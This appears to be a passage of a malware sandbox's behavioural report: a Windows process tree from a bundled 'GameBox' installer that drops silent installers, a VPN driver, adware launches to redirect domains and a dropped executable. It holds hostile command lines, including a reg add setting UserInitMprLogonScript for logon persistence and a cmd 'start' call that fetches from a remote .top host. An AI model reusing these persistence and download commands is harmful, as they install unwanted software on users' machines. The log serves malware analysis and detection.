- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1452 -ip 14521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-ECFH8.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-ECFH8.tmp\MediaBurner2.tmp" /SL5="$20368,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-7IF7T.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-7IF7T.tmp\3377047_logo_media.exe" /S /UID=burnerch22⤵
-
C:\Program Files\Uninstall Information\YKIFPSDJBJ\ultramediaburner.exe"C:\Program Files\Uninstall Information\YKIFPSDJBJ\ultramediaburner.exe" /VERYSILENT3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\8e-bfa8b-397-9c3ac-c931b3104d6ad\SHabinuliju.exe"C:\Users\Admin\AppData\Local\Temp\8e-bfa8b-397-9c3ac-c931b3104d6ad\SHabinuliju.exe"3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e64⤵
- Checks SCSI registry key(s)
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9f81746f8,0x7ff9f8174708,0x7ff9f81747185⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e8,0x1c0,0x1ec,0x1e4,0x1f0,0x7ff9f81746f8,0x7ff9f8174708,0x7ff9f81747185⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514834⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f81746f8,0x7ff9f8174708,0x7ff9f81747185⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515134⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0xdc,0x108,0x100,0x10c,0x7ff9f81746f8,0x7ff9f8174708,0x7ff9f81747185⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872154⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f81746f8,0x7ff9f8174708,0x7ff9f81747185⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631194⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1bc,0x1c0,0x1c4,0x198,0x1c8,0x7ff9f81746f8,0x7ff9f8174708,0x7ff9f81747185⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942314⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f81746f8,0x7ff9f8174708,0x7ff9f81747185⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\57-cb145-40c-5baa3-4ec2942061e98\Lalomaepaemo.exe"C:\Users\Admin\AppData\Local\Temp\57-cb145-40c-5baa3-4ec2942061e98\Lalomaepaemo.exe"3⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s30bjnfb.3xo\GcleanerEU.exe /eufive & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\s30bjnfb.3xo\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\s30bjnfb.3xo\GcleanerEU.exe /eufive5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3824 -s 2566⤵
- Program crash
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ssuexr5l.f1l\installer.exe /qn CAMPAIGN="654" & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\ssuexr5l.f1l\installer.exeC:\Users\Admin\AppData\Local\Temp\ssuexr5l.f1l\installer.exe /qn CAMPAIGN="654"5⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ssuexr5l.f1l\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ssuexr5l.f1l\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629407961 /qn CAMPAIGN=""654"" " CAMPAIGN="654"6⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ths4uzi.soc\ufgaa.exe & exit4⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bwv0agf2.4fc\anyname.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\bwv0agf2.4fc\anyname.exeC:\Users\Admin\AppData\Local\Temp\bwv0agf2.4fc\anyname.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\bwv0agf2.4fc\anyname.exe"C:\Users\Admin\AppData\Local\Temp\bwv0agf2.4fc\anyname.exe" -q6⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wl4zu4ws.ls5\gcleaner.exe /mixfive & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\wl4zu4ws.ls5\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\wl4zu4ws.ls5\gcleaner.exe /mixfive5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 2566⤵
- Program crash
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2h1f2naq.eh0\autosubplayer.exe /S & exit4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-O9UJK.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-O9UJK.tmp\VPN.tmp" /SL5="$1036C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-6GPVG.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-6GPVG.tmp\Setup.exe" /silent /subid=7202⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\is-6B9A0.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-6B9A0.tmp\Setup.tmp" /SL5="$302CE,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-6GPVG.tmp\Setup.exe" /silent /subid=7203⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "4⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09015⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "4⤵
- Blocklisted process makes network request
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09015⤵
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall4⤵
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetThreadContext
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-70BV1.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-70BV1.tmp\Inlog.tmp" /SL5="$60176,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-72KFG.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-72KFG.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7212⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-HJANM.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-HJANM.tmp\Setup.tmp" /SL5="$404EC,17352168,721408,C:\Users\Admin\AppData\Local\Temp\is-72KFG.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7213⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-DAIEP.tmp\{app}\microsoft.cab -F:* %ProgramData%4⤵
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-DAIEP.tmp\{app}\microsoft.cab -F:* C:\ProgramData5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f5⤵
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\is-DAIEP.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-DAIEP.tmp\{app}\vdi_compiler"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 2605⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7214⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=7215⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ff9f81746f8,0x7ff9f8174708,0x7ff9f81747186⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:26⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:36⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:86⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3128 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3152 /prefetch:16⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4200 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3124 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3404 /prefetch:86⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3404 /prefetch:86⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2084 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1652 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6084 /prefetch:26⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2084 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6176 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6508 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1912 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1724 /prefetch:16⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5564 /prefetch:86⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:16⤵
-
-
